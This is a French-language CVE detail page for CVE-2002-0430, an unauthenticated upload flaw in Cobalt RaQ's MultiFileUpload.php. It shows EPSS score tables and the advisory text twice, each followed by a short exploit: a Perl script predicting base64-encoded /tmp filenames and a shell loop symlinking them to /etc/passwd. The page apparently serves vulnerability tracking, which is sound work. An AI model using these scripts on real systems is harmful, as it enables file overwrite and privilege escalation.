CVE-2002-0430 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2	EPSS V3
2022-02-06	–	–	1.76%	–
2022-03-27	–	–	1.76%	–
2022-04-03	–	–	1.76%	–
2022-04-17	–	–	1.76%	–
2022-08-28	–	–	1.76%	–
2023-03-05	–	–	1.76%	–
2023-03-12	–	–	–	0.04%
2024-06-02	–	–	–	0.04%
2024-06-02	–	–	–	0.04,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2024-06-02	–

source: https://www.securityfocus.com/bid/4252/info Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems. The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials. In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user. Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link. Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space. #!/usr/bin/perl # mass base64 time encoder # part of Cobalt UIFC XTR remote/local combination attack use MIME::Base64; $evil_time = time(); $exploit_secs = 10; # time in seconds you got to exploit this bug (race) for($i=1;$i<=$exploit_secs; $i++) { $evil_time = $evil_time+1; $evilstr = encode_base64($evil_time); print $evilstr; }

source: https://www.securityfocus.com/bid/4252/info Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems. The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials. In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user. Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link. Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space. #!/bin/sh #Script for creating symlinks from output of local-timerace-xtr for foo in `perl -x xtr-timerace-xtr.pl` do ln -s /etc/passwd $foo done